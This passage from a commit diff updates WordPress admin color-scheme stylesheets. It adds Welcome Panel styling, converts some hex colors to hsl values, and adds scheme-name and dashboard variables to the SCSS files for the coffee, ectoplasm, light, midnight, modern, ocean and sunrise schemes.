 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
670 670 
   border-bottom-color: #c7a589;
671 671 
   color: #0073aa;
672 
+}
673 
+
674 
+/* Welcome Panel */
675 
+.welcome-panel {
676 
+  background-color: #f8f4f1;
677 
+}
678 
+
679 
+.welcome-panel-header-image .about-six {
680 
+  fill: #c7a589;
681 
+}
682 
+
683 
+.welcome-panel-header-image .about-zero {
684 
+  fill: #59524c;
685 
+}
686 
+
687 
+[class*=welcome-panel-icon] {
688 
+  background-color: #59524c;
672 689 
 }

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/colors/coffee/colors.min.css


+ 1 - 0
app/wp-admin/css/colors/coffee/colors.scss
Ver Arquivo 

@@ -1,3 +1,4 @@
1 
+$scheme-name: "coffee";
1 2 
 $base-color: #59524c;
2 3 
 $highlight-color: #c7a589;
3 4 
 $notification-color: #9ea476;

+ 17 - 0
app/wp-admin/css/colors/ectoplasm/colors-rtl.css
Ver Arquivo 

@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702 
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703 
   border-bottom-color: #a3b745;
704 704 
   color: #0073aa;
705 
+}
706 
+
707 
+/* Welcome Panel */
708 
+.welcome-panel {
709 
+  background-color: #f4f6e9;
710 
+}
711 
+
712 
+.welcome-panel-header-image .about-six {
713 
+  fill: #a3b745;
714 
+}
715 
+
716 
+.welcome-panel-header-image .about-zero {
717 
+  fill: #523f6d;
718 
+}
719 
+
720 
+[class*=welcome-panel-icon] {
721 
+  background-color: #523f6d;
705 722 
 }

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/colors/ectoplasm/colors-rtl.min.css


+ 17 - 0
app/wp-admin/css/colors/ectoplasm/colors.css
Ver Arquivo 

@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702 
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703 
   border-bottom-color: #a3b745;
704 704 
   color: #0073aa;
705 
+}
706 
+
707 
+/* Welcome Panel */
708 
+.welcome-panel {
709 
+  background-color: #f4f6e9;
710 
+}
711 
+
712 
+.welcome-panel-header-image .about-six {
713 
+  fill: #a3b745;
714 
+}
715 
+
716 
+.welcome-panel-header-image .about-zero {
717 
+  fill: #523f6d;
718 
+}
719 
+
720 
+[class*=welcome-panel-icon] {
721 
+  background-color: #523f6d;
705 722 
 }

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/colors/ectoplasm/colors.min.css


+ 1 - 0
app/wp-admin/css/colors/ectoplasm/colors.scss
Ver Arquivo 

@@ -1,3 +1,4 @@
1 
+$scheme-name: "ectoplasm";
1 2 
 $base-color: #523f6d;
2 3 
 $icon-color: #ece6f6;
3 4 
 $highlight-color: #a3b745;

+ 17 - 0
app/wp-admin/css/colors/light/colors-rtl.css
Ver Arquivo 

@@ -704,6 +704,23 @@ div#wp-responsive-toggle a:before {
704 704 
   color: #0073aa;
705 705 
 }
706 706
707 
+/* Welcome Panel */
708 
+.welcome-panel {
709 
+  background-color: #e1f4f9;
710 
+}
711 
+
712 
+.welcome-panel-header-image .about-six {
713 
+  fill: #04a4cc;
714 
+}
715 
+
716 
+.welcome-panel-header-image .about-zero {
717 
+  fill: #999;
718 
+}
719 
+
720 
+[class*=welcome-panel-icon] {
721 
+  background-color: #333;
722 
+}
723 
+
707 724 
 /* Override the theme filter highlight color for this scheme */
708 725 
 .theme-section.current,
709 726 
 .theme-filter.current {

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/colors/light/colors-rtl.min.css


+ 17 - 0
app/wp-admin/css/colors/light/colors.css
Ver Arquivo 

@@ -704,6 +704,23 @@ div#wp-responsive-toggle a:before {
704 704 
   color: #0073aa;
705 705 
 }
706 706
707 
+/* Welcome Panel */
708 
+.welcome-panel {
709 
+  background-color: #e1f4f9;
710 
+}
711 
+
712 
+.welcome-panel-header-image .about-six {
713 
+  fill: #04a4cc;
714 
+}
715 
+
716 
+.welcome-panel-header-image .about-zero {
717 
+  fill: #999;
718 
+}
719 
+
720 
+[class*=welcome-panel-icon] {
721 
+  background-color: #333;
722 
+}
723 
+
707 724 
 /* Override the theme filter highlight color for this scheme */
708 725 
 .theme-section.current,
709 726 
 .theme-filter.current {

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/colors/light/colors.min.css


+ 4 - 0
app/wp-admin/css/colors/light/colors.scss
Ver Arquivo 

@@ -1,3 +1,4 @@
1 
+$scheme-name: "light";
1 2 
 $base-color: #e5e5e5;
2 3 
 $icon-color: #999;
3 4 
 $text-color: #333;
 
@@ -17,6 +18,9 @@ $menu-submenu-background: #fff;
17 18 
 $menu-collapse-text: #777;
18 19 
 $menu-collapse-focus-icon: #555;
19 20
21 
+$dashboard-accent-2: $icon-color;
22 
+$dashboard-icon-background: $text-color;
23 
+
20 24 
 @import "../_admin.scss";
21 25
22 26 
 /* Override the theme filter highlight color for this scheme */

+ 26 - 9
app/wp-admin/css/colors/midnight/colors-rtl.css
Ver Arquivo 

@@ -188,7 +188,7 @@ textarea:focus {
188 188 
   color: #69a8bb;
189 189 
 }
190 190 
 .wp-core-ui .wp-ui-text-icon {
191 
-  color: #f1f2f3;
191 
+  color: hsl(206.6666666667deg, 7%, 95%);
192 192 
 }
193 193
194 194 
 /* List tables */
 
@@ -229,7 +229,7 @@ textarea:focus {
229 229 
 }
230 230
231 231 
 #adminmenu div.wp-menu-image:before {
232 
-  color: #f1f2f3;
232 
+  color: hsl(206.6666666667deg, 7%, 95%);
233 233 
 }
234 234
235 235 
 #adminmenu a:hover,
 
@@ -341,7 +341,7 @@ ul#adminmenu > li.current > a.current:after {
341 341
342 342 
 /* Admin Menu: collapse button */
343 343 
 #collapse-button {
344 
-  color: #f1f2f3;
344 
+  color: hsl(206.6666666667deg, 7%, 95%);
345 345 
 }
346 346
347 347 
 #collapse-button:hover,
 
@@ -366,7 +366,7 @@ ul#adminmenu > li.current > a.current:after {
366 366 
 #wpadminbar .ab-icon:before,
367 367 
 #wpadminbar .ab-item:before,
368 368 
 #wpadminbar .ab-item:after {
369 
-  color: #f1f2f3;
369 
+  color: hsl(206.6666666667deg, 7%, 95%);
370 370 
 }
371 371
372 372 
 #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item,
 
@@ -410,7 +410,7 @@ ul#adminmenu > li.current > a.current:after {
410 410
411 411 
 #wpadminbar .quicklinks li .blavatar,
412 412 
 #wpadminbar .menupop .menupop > .ab-item:before {
413 
-  color: #f1f2f3;
413 
+  color: hsl(206.6666666667deg, 7%, 95%);
414 414 
 }
415 415
416 416 
 #wpadminbar .quicklinks .menupop ul li a:hover,
 
@@ -445,12 +445,12 @@ ul#adminmenu > li.current > a.current:after {
445 445
446 446 
 #wpadminbar.mobile .quicklinks .hover .ab-icon:before,
447 447 
 #wpadminbar.mobile .quicklinks .hover .ab-item:before {
448 
-  color: #f1f2f3;
448 
+  color: hsl(206.6666666667deg, 7%, 95%);
449 449 
 }
450 450
451 451 
 /* Admin Bar: search */
452 452 
 #wpadminbar #adminbarsearch:before {
453 
-  color: #f1f2f3;
453 
+  color: hsl(206.6666666667deg, 7%, 95%);
454 454 
 }
455 455
456 456 
 #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus {
 
@@ -586,7 +586,7 @@ body.more-filters-opened .more-filters:focus:before {
586 586
587 587 
 /* Responsive Component */
588 588 
 div#wp-responsive-toggle a:before {
589 
-  color: #f1f2f3;
589 
+  color: hsl(206.6666666667deg, 7%, 95%);
590 590 
 }
591 591
592 592 
 .wp-responsive-open div#wp-responsive-toggle a {
 
@@ -599,7 +599,7 @@ div#wp-responsive-toggle a:before {
599 599 
 }
600 600
601 601 
 .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before {
602 
-  color: #f1f2f3;
602 
+  color: hsl(206.6666666667deg, 7%, 95%);
603 603 
 }
604 604
605 605 
 /* TinyMCE */
 
@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702 
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703 
   border-bottom-color: #e14d43;
704 704 
   color: #0073aa;
705 
+}
706 
+
707 
+/* Welcome Panel */
708 
+.welcome-panel {
709 
+  background-color: #fbeae8;
710 
+}
711 
+
712 
+.welcome-panel-header-image .about-six {
713 
+  fill: #e14d43;
714 
+}
715 
+
716 
+.welcome-panel-header-image .about-zero {
717 
+  fill: #363b3f;
718 
+}
719 
+
720 
+[class*=welcome-panel-icon] {
721 
+  background-color: #e14d43;
705 722 
 }

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/colors/midnight/colors-rtl.min.css


+ 26 - 9
app/wp-admin/css/colors/midnight/colors.css
Ver Arquivo 

@@ -188,7 +188,7 @@ textarea:focus {
188 188 
   color: #69a8bb;
189 189 
 }
190 190 
 .wp-core-ui .wp-ui-text-icon {
191 
-  color: #f1f2f3;
191 
+  color: hsl(206.6666666667deg, 7%, 95%);
192 192 
 }
193 193
194 194 
 /* List tables */
 
@@ -229,7 +229,7 @@ textarea:focus {
229 229 
 }
230 230
231 231 
 #adminmenu div.wp-menu-image:before {
232 
-  color: #f1f2f3;
232 
+  color: hsl(206.6666666667deg, 7%, 95%);
233 233 
 }
234 234
235 235 
 #adminmenu a:hover,
 
@@ -341,7 +341,7 @@ ul#adminmenu > li.current > a.current:after {
341 341
342 342 
 /* Admin Menu: collapse button */
343 343 
 #collapse-button {
344 
-  color: #f1f2f3;
344 
+  color: hsl(206.6666666667deg, 7%, 95%);
345 345 
 }
346 346
347 347 
 #collapse-button:hover,
 
@@ -366,7 +366,7 @@ ul#adminmenu > li.current > a.current:after {
366 366 
 #wpadminbar .ab-icon:before,
367 367 
 #wpadminbar .ab-item:before,
368 368 
 #wpadminbar .ab-item:after {
369 
-  color: #f1f2f3;
369 
+  color: hsl(206.6666666667deg, 7%, 95%);
370 370 
 }
371 371
372 372 
 #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item,
 
@@ -410,7 +410,7 @@ ul#adminmenu > li.current > a.current:after {
410 410
411 411 
 #wpadminbar .quicklinks li .blavatar,
412 412 
 #wpadminbar .menupop .menupop > .ab-item:before {
413 
-  color: #f1f2f3;
413 
+  color: hsl(206.6666666667deg, 7%, 95%);
414 414 
 }
415 415
416 416 
 #wpadminbar .quicklinks .menupop ul li a:hover,
 
@@ -445,12 +445,12 @@ ul#adminmenu > li.current > a.current:after {
445 445
446 446 
 #wpadminbar.mobile .quicklinks .hover .ab-icon:before,
447 447 
 #wpadminbar.mobile .quicklinks .hover .ab-item:before {
448 
-  color: #f1f2f3;
448 
+  color: hsl(206.6666666667deg, 7%, 95%);
449 449 
 }
450 450
451 451 
 /* Admin Bar: search */
452 452 
 #wpadminbar #adminbarsearch:before {
453 
-  color: #f1f2f3;
453 
+  color: hsl(206.6666666667deg, 7%, 95%);
454 454 
 }
455 455
456 456 
 #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus {
 
@@ -586,7 +586,7 @@ body.more-filters-opened .more-filters:focus:before {
586 586
587 587 
 /* Responsive Component */
588 588 
 div#wp-responsive-toggle a:before {
589 
-  color: #f1f2f3;
589 
+  color: hsl(206.6666666667deg, 7%, 95%);
590 590 
 }
591 591
592 592 
 .wp-responsive-open div#wp-responsive-toggle a {
 
@@ -599,7 +599,7 @@ div#wp-responsive-toggle a:before {
599 599 
 }
600 600
601 601 
 .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before {
602 
-  color: #f1f2f3;
602 
+  color: hsl(206.6666666667deg, 7%, 95%);
603 603 
 }
604 604
605 605 
 /* TinyMCE */
 
@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702 
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703 
   border-bottom-color: #e14d43;
704 704 
   color: #0073aa;
705 
+}
706 
+
707 
+/* Welcome Panel */
708 
+.welcome-panel {
709 
+  background-color: #fbeae8;
710 
+}
711 
+
712 
+.welcome-panel-header-image .about-six {
713 
+  fill: #e14d43;
714 
+}
715 
+
716 
+.welcome-panel-header-image .about-zero {
717 
+  fill: #363b3f;
718 
+}
719 
+
720 
+[class*=welcome-panel-icon] {
721 
+  background-color: #e14d43;
705 722 
 }

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/colors/midnight/colors.min.css


+ 3 - 0
app/wp-admin/css/colors/midnight/colors.scss
Ver Arquivo 

@@ -1,5 +1,8 @@
1 
+$scheme-name: "midnight";
1 2 
 $base-color: #363b3f;
2 3 
 $highlight-color: #e14d43;
3 4 
 $notification-color: #69a8bb;
4 5
6 
+$dashboard-icon-background: $highlight-color;
7 
+
5 8 
 @import "../_admin.scss";

+ 26 - 9
app/wp-admin/css/colors/modern/colors-rtl.css
Ver Arquivo 

@@ -188,7 +188,7 @@ textarea:focus {
188 188 
   color: #3858e9;
189 189 
 }
190 190 
 .wp-core-ui .wp-ui-text-icon {
191 
-  color: #f3f1f1;
191 
+  color: hsl(0deg, 7%, 95%);
192 192 
 }
193 193
194 194 
 /* List tables */
 
@@ -229,7 +229,7 @@ textarea:focus {
229 229 
 }
230 230
231 231 
 #adminmenu div.wp-menu-image:before {
232 
-  color: #f3f1f1;
232 
+  color: hsl(0deg, 7%, 95%);
233 233 
 }
234 234
235 235 
 #adminmenu a:hover,
 
@@ -341,7 +341,7 @@ ul#adminmenu > li.current > a.current:after {
341 341
342 342 
 /* Admin Menu: collapse button */
343 343 
 #collapse-button {
344 
-  color: #f3f1f1;
344 
+  color: hsl(0deg, 7%, 95%);
345 345 
 }
346 346
347 347 
 #collapse-button:hover,
 
@@ -366,7 +366,7 @@ ul#adminmenu > li.current > a.current:after {
366 366 
 #wpadminbar .ab-icon:before,
367 367 
 #wpadminbar .ab-item:before,
368 368 
 #wpadminbar .ab-item:after {
369 
-  color: #f3f1f1;
369 
+  color: hsl(0deg, 7%, 95%);
370 370 
 }
371 371
372 372 
 #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item,
 
@@ -410,7 +410,7 @@ ul#adminmenu > li.current > a.current:after {
410 410
411 411 
 #wpadminbar .quicklinks li .blavatar,
412 412 
 #wpadminbar .menupop .menupop > .ab-item:before {
413 
-  color: #f3f1f1;
413 
+  color: hsl(0deg, 7%, 95%);
414 414 
 }
415 415
416 416 
 #wpadminbar .quicklinks .menupop ul li a:hover,
 
@@ -445,12 +445,12 @@ ul#adminmenu > li.current > a.current:after {
445 445
446 446 
 #wpadminbar.mobile .quicklinks .hover .ab-icon:before,
447 447 
 #wpadminbar.mobile .quicklinks .hover .ab-item:before {
448 
-  color: #f3f1f1;
448 
+  color: hsl(0deg, 7%, 95%);
449 449 
 }
450 450
451 451 
 /* Admin Bar: search */
452 452 
 #wpadminbar #adminbarsearch:before {
453 
-  color: #f3f1f1;
453 
+  color: hsl(0deg, 7%, 95%);
454 454 
 }
455 455
456 456 
 #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus {
 
@@ -586,7 +586,7 @@ body.more-filters-opened .more-filters:focus:before {
586 586
587 587 
 /* Responsive Component */
588 588 
 div#wp-responsive-toggle a:before {
589 
-  color: #f3f1f1;
589 
+  color: hsl(0deg, 7%, 95%);
590 590 
 }
591 591
592 592 
 .wp-responsive-open div#wp-responsive-toggle a {
 
@@ -599,7 +599,7 @@ div#wp-responsive-toggle a:before {
599 599 
 }
600 600
601 601 
 .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before {
602 
-  color: #f3f1f1;
602 
+  color: hsl(0deg, 7%, 95%);
603 603 
 }
604 604
605 605 
 /* TinyMCE */
 
@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702 
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703 
   border-bottom-color: #3858e9;
704 704 
   color: #3858e9;
705 
+}
706 
+
707 
+/* Welcome Panel */
708 
+.welcome-panel {
709 
+  background-color: #e7ebfc;
710 
+}
711 
+
712 
+.welcome-panel-header-image .about-six {
713 
+  fill: #3858e9;
714 
+}
715 
+
716 
+.welcome-panel-header-image .about-zero {
717 
+  fill: #1b8362;
718 
+}
719 
+
720 
+[class*=welcome-panel-icon] {
721 
+  background-color: #1d2327;
705 722 
 }

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/colors/modern/colors-rtl.min.css


+ 26 - 9
app/wp-admin/css/colors/modern/colors.css
Ver Arquivo 

@@ -188,7 +188,7 @@ textarea:focus {
188 188 
   color: #3858e9;
189 189 
 }
190 190 
 .wp-core-ui .wp-ui-text-icon {
191 
-  color: #f3f1f1;
191 
+  color: hsl(0deg, 7%, 95%);
192 192 
 }
193 193
194 194 
 /* List tables */
 
@@ -229,7 +229,7 @@ textarea:focus {
229 229 
 }
230 230
231 231 
 #adminmenu div.wp-menu-image:before {
232 
-  color: #f3f1f1;
232 
+  color: hsl(0deg, 7%, 95%);
233 233 
 }
234 234
235 235 
 #adminmenu a:hover,
 
@@ -341,7 +341,7 @@ ul#adminmenu > li.current > a.current:after {
341 341
342 342 
 /* Admin Menu: collapse button */
343 343 
 #collapse-button {
344 
-  color: #f3f1f1;
344 
+  color: hsl(0deg, 7%, 95%);
345 345 
 }
346 346
347 347 
 #collapse-button:hover,
 
@@ -366,7 +366,7 @@ ul#adminmenu > li.current > a.current:after {
366 366 
 #wpadminbar .ab-icon:before,
367 367 
 #wpadminbar .ab-item:before,
368 368 
 #wpadminbar .ab-item:after {
369 
-  color: #f3f1f1;
369 
+  color: hsl(0deg, 7%, 95%);
370 370 
 }
371 371
372 372 
 #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item,
 
@@ -410,7 +410,7 @@ ul#adminmenu > li.current > a.current:after {
410 410
411 411 
 #wpadminbar .quicklinks li .blavatar,
412 412 
 #wpadminbar .menupop .menupop > .ab-item:before {
413 
-  color: #f3f1f1;
413 
+  color: hsl(0deg, 7%, 95%);
414 414 
 }
415 415
416 416 
 #wpadminbar .quicklinks .menupop ul li a:hover,
 
@@ -445,12 +445,12 @@ ul#adminmenu > li.current > a.current:after {
445 445
446 446 
 #wpadminbar.mobile .quicklinks .hover .ab-icon:before,
447 447 
 #wpadminbar.mobile .quicklinks .hover .ab-item:before {
448 
-  color: #f3f1f1;
448 
+  color: hsl(0deg, 7%, 95%);
449 449 
 }
450 450
451 451 
 /* Admin Bar: search */
452 452 
 #wpadminbar #adminbarsearch:before {
453 
-  color: #f3f1f1;
453 
+  color: hsl(0deg, 7%, 95%);
454 454 
 }
455 455
456 456 
 #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus {
 
@@ -586,7 +586,7 @@ body.more-filters-opened .more-filters:focus:before {
586 586
587 587 
 /* Responsive Component */
588 588 
 div#wp-responsive-toggle a:before {
589 
-  color: #f3f1f1;
589 
+  color: hsl(0deg, 7%, 95%);
590 590 
 }
591 591
592 592 
 .wp-responsive-open div#wp-responsive-toggle a {
 
@@ -599,7 +599,7 @@ div#wp-responsive-toggle a:before {
599 599 
 }
600 600
601 601 
 .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before {
602 
-  color: #f3f1f1;
602 
+  color: hsl(0deg, 7%, 95%);
603 603 
 }
604 604
605 605 
 /* TinyMCE */
 
@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702 
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703 
   border-bottom-color: #3858e9;
704 704 
   color: #3858e9;
705 
+}
706 
+
707 
+/* Welcome Panel */
708 
+.welcome-panel {
709 
+  background-color: #e7ebfc;
710 
+}
711 
+
712 
+.welcome-panel-header-image .about-six {
713 
+  fill: #3858e9;
714 
+}
715 
+
716 
+.welcome-panel-header-image .about-zero {
717 
+  fill: #1b8362;
718 
+}
719 
+
720 
+[class*=welcome-panel-icon] {
721 
+  background-color: #1d2327;
705 722 
 }

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/colors/modern/colors.min.css


+ 5 - 0
app/wp-admin/css/colors/modern/colors.scss
Ver Arquivo 

@@ -1,3 +1,4 @@
1 
+$scheme-name: "modern";
1 2 
 $base-color: #1e1e1e;
2 3 
 $highlight-color: #3858e9;
3 4 
 $menu-submenu-focus-text: #33f078;
 
@@ -6,4 +7,8 @@ $notification-color: $highlight-color;
6 7 
 $link: $highlight-color;
7 8 
 $link-focus: darken($highlight-color, 10%);
8 9
10 
+$dashboard-accent-1: #3858e9;
11 
+$dashboard-accent-2: #1b8362;
12 
+$dashboard-icon-background: #1d2327;
13 
+
9 14 
 @import "../_admin.scss";

+ 17 - 0
app/wp-admin/css/colors/ocean/colors-rtl.css
Ver Arquivo 

@@ -669,4 +669,21 @@ div#wp-responsive-toggle a:before {
669 669 
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
670 670 
   border-bottom-color: #9ebaa0;
671 671 
   color: #0073aa;
672 
+}
673 
+
674 
+/* Welcome Panel */
675 
+.welcome-panel {
676 
+  background-color: #f3f7f4;
677 
+}
678 
+
679 
+.welcome-panel-header-image .about-six {
680 
+  fill: #9ebaa0;
681 
+}
682 
+
683 
+.welcome-panel-header-image .about-zero {
684 
+  fill: #738e96;
685 
+}
686 
+
687 
+[class*=welcome-panel-icon] {
688 
+  background-color: #738e96;
672 689 
 }

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/colors/ocean/colors-rtl.min.css


+ 17 - 0
app/wp-admin/css/colors/ocean/colors.css
Ver Arquivo 

@@ -669,4 +669,21 @@ div#wp-responsive-toggle a:before {
669 669 
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
670 670 
   border-bottom-color: #9ebaa0;
671 671 
   color: #0073aa;
672 
+}
673 
+
674 
+/* Welcome Panel */
675 
+.welcome-panel {
676 
+  background-color: #f3f7f4;
677 
+}
678 
+
679 
+.welcome-panel-header-image .about-six {
680 
+  fill: #9ebaa0;
681 
+}
682 
+
683 
+.welcome-panel-header-image .about-zero {
684 
+  fill: #738e96;
685 
+}
686 
+
687 
+[class*=welcome-panel-icon] {
688 
+  background-color: #738e96;
672 689 
 }

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/colors/ocean/colors.min.css


+ 1 - 0
app/wp-admin/css/colors/ocean/colors.scss
Ver Arquivo 

@@ -1,3 +1,4 @@
1 
+$scheme-name: "ocean";
1 2 
 $base-color: #738e96;
2 3 
 $icon-color: #f2fcff;
3 4 
 $highlight-color: #9ebaa0;

+ 26 - 9
app/wp-admin/css/colors/sunrise/colors-rtl.css
Ver Arquivo 

@@ -188,7 +188,7 @@ textarea:focus {
188 188 
   color: #ccaf0b;
189 189 
 }
190 190 
 .wp-core-ui .wp-ui-text-icon {
191 
-  color: #f3f1f1;
191 
+  color: hsl(2.1582733813deg, 7%, 95%);
192 192 
 }
193 193
194 194 
 /* List tables */
 
@@ -229,7 +229,7 @@ textarea:focus {
229 229 
 }
230 230
231 231 
 #adminmenu div.wp-menu-image:before {
232 
-  color: #f3f1f1;
232 
+  color: hsl(2.1582733813deg, 7%, 95%);
233 233 
 }
234 234
235 235 
 #adminmenu a:hover,
 
@@ -341,7 +341,7 @@ ul#adminmenu > li.current > a.current:after {
341 341
342 342 
 /* Admin Menu: collapse button */
343 343 
 #collapse-button {
344 
-  color: #f3f1f1;
344 
+  color: hsl(2.1582733813deg, 7%, 95%);
345 345 
 }
346 346
347 347 
 #collapse-button:hover,
 
@@ -366,7 +366,7 @@ ul#adminmenu > li.current > a.current:after {
366 366 
 #wpadminbar .ab-icon:before,
367 367 
 #wpadminbar .ab-item:before,
368 368 
 #wpadminbar .ab-item:after {
369 
-  color: #f3f1f1;
369 
+  color: hsl(2.1582733813deg, 7%, 95%);
370 370 
 }
371 371
372 372 
 #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item,
 
@@ -410,7 +410,7 @@ ul#adminmenu > li.current > a.current:after {
410 410
411 411 
 #wpadminbar .quicklinks li .blavatar,
412 412 
 #wpadminbar .menupop .menupop > .ab-item:before {
413 
-  color: #f3f1f1;
413 
+  color: hsl(2.1582733813deg, 7%, 95%);
414 414 
 }
415 415
416 416 
 #wpadminbar .quicklinks .menupop ul li a:hover,
 
@@ -445,12 +445,12 @@ ul#adminmenu > li.current > a.current:after {
445 445
446 446 
 #wpadminbar.mobile .quicklinks .hover .ab-icon:before,
447 447 
 #wpadminbar.mobile .quicklinks .hover .ab-item:before {
448 
-  color: #f3f1f1;
448 
+  color: hsl(2.1582733813deg, 7%, 95%);
449 449 
 }
450 450
451 451 
 /* Admin Bar: search */
452 452 
 #wpadminbar #adminbarsearch:before {
453 
-  color: #f3f1f1;
453 
+  color: hsl(2.1582733813deg, 7%, 95%);
454 454 
 }
455 455
456 456 
 #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus {
 
@@ -586,7 +586,7 @@ body.more-filters-opened .more-filters:focus:before {
586 586
587 587 
 /* Responsive Component */
588 588 
 div#wp-responsive-toggle a:before {
589 
-  color: #f3f1f1;
589 
+  color: hsl(2.1582733813deg, 7%, 95%);
590 590 
 }
591 591
592 592 
 .wp-responsive-open div#wp-responsive-toggle a {
 
@@ -599,7 +599,7 @@ div#wp-responsive-toggle a:before {
599 599 
 }
600 600
601 601 
 .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before {
602 
-  color: #f3f1f1;
602 
+  color: hsl(2.1582733813deg, 7%, 95%);
603 603 
 }
604 604
605 605 
 /* TinyMCE */
 
@@ -702,4 +702,21 @@ div#wp-responsive-toggle a:before {
702 702 
 .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover {
703 703 
   border-bottom-color: #dd823b;
704 704 
   color: #0073aa;
705 
+}
706 
+
707 
+/* Welcome Panel */
708 
+.welcome-panel {
709 
